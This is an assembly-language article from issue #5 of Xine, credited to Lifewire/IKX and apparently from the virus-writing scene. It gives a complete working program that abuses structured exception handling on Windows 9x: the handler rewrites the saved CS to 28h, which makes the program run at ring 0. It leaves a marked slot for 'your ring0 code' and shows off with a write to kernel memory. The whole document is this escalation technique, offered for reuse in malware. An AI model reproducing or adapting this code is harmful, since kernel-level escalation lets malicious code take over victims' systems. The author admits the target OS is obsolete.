Xine - issue #5 - Phile 115
Ú-----------------------------¿
| Xine - issue #5 - Phile 115 |
À-----------------------------Ù
; Another way to get on ring0 in 9x. Not useful nowadays, but maybe you
; find it interesting... and it is new so it is cool (?!) :)
; btw, the clue in 9x to get @ r0 is just to exec at cs=28, jmpfar & iret
; etc. aren't allowed.. so do it in this way.
;
; hmm. I see z0mbie has something like this published in mtx2 too.. hmmz
; ok, i ripped the ring0 safety pushes / stackinit from him :)
.386p
.model flat
extrn ExitProcess:PROC; ;apis are your best friend :)
;----------------------------------------------------------------------------;
_CODE segment dword use32 public 'CODE'
start:
int 3 ;bpint 3 do "reip eip+1" ?
call initring0 ;seh addr. on stack due call
;this is the seh.. believe me or not
pushad
mov edx,dword ptr [esp+3*4+20h] ;where is the context record?
;maybe in edx? well i hope, u?
push 28h
pop eax ;oh how optimized is me! ;)
xchg [edx+0bch],eax ;0bch = regCS
mov [oldcs],eax ;lets save it
mov dword ptr [edx+0b8h],offset ring0code ;0b8h = regEip
popad ;pop
xor eax,eax ;continue exec
ret ;read further @ ring0code
initring0:
xor edx,edx
push dword ptr fs:[edx]
mov fs:[edx],esp ;esp points to addr. seh
inc dword ptr [edx] ;read further after initring0
;----------------------------------------------------------------------------;
ring0code: ;same offset... other segment
int 3 ;viva la softice
mov dword ptr ss:[oldesp], esp ;save current ESP
lea esp, endstack ;esp pointed not to stack!
pushad
push ds es
push ss ss ;make es & ds <- ss
pop ds es
;-- put your ring0 code from here
inc dword ptr ds:[0bff70400h] ;show off with our power :)
;-- till here
pop es ds ;restore es & ds
popad
mov esp, dword ptr ss:[oldesp] ;restore esp, else *crash*
exit_ring0: ;say bye to ring0, welcome r3
pushf
push oldcs
push offset ring3
iret
;----------------------------------------------------------------------------;
ring3: ;and here we are a ring3 lamer
xor edx,edx
pop dword ptr fs:[edx] ;restore the seh
pop edx ;and undo the call initring0
push 0
call ExitProcess
oldcs dd ? ;here we stored the org. CS
oldesp dd ? ;and here... maybe esp?
mystack db 1024 dup (0h)
endstack:
_CODE ends
;----------------------------------------------------------------------------;
;----------------------------------------------------------------------------;
_DATA segment dword use32 public 'DATA'
db "ring0 by Lifewire/IKX"
_DATA ends
;----------------------------------------------------------------------------;
end start
end